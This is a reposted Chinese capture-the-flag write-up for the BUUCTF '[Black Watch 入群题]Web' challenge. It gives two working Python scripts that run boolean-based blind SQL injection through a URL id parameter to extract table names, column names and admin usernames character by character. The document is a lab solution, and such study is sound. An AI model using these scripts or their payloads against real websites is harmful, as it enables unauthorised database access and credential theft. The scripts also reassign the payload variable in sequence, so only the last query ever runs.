[Black Watch 入群题]Web

布尔盲注，爆出用户密码登录得flag

抑或

import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id=2^"

name = ""
i=0
while True :
	head = 32
	tail = 127
	i += 1
	while(head<tail):
		mid = head + tail >> 1
		payload = "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" %(i,mid)
		payload = "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='contents')),%d,1))>%d)" %(i,mid)
		payload = "(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d)" %(i,mid)
		
		r = requests.get(url+payload)
		#print(url+payload)
		#print(r.json())
		if "Yunen" in str(r.json()):
			head = mid + 1
		else:
			tail = mid
	if head!=32 :
		name += chr(head)
		print(name)
	else:
		break

if

import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id="

name = ""
i=0
while True :
	head = 32
	tail = 127
	i += 1
	while(head<tail):
		mid = head + tail >> 1
		payload = "if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,3,2)" %(i,mid)
		payload = "if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='contents')),%d,1))>%d,3,2)" %(i,mid)
		payload = "if(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d,3,2)" %(i,mid)
		
		r = requests.get(url+payload)
		#print(url+payload)
		#print(r.json())
		if "Yunen" in str(r.json()):
			head = mid + 1
		else:
			tail = mid
	if head!=32 :
		name += chr(head)
		print(name)
	else:
		break

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 [Black Watch 入群题]PWN Web前端交流群 qq群设置付费入群需要什么条件？ HDU 1312 Red and Black(DFS,板子题,详解,零基础教你代码实现DFS) ctfshow—web—web签到题初入spring boot（四）web项目 THO医鸣会 - 医疗行业微信群入群说明 2021-9-2内部群每日三题-清辉PMP 2021-9-8内部群每日三题-清辉PMP 2021-9-9内部群每日三题-清辉PMP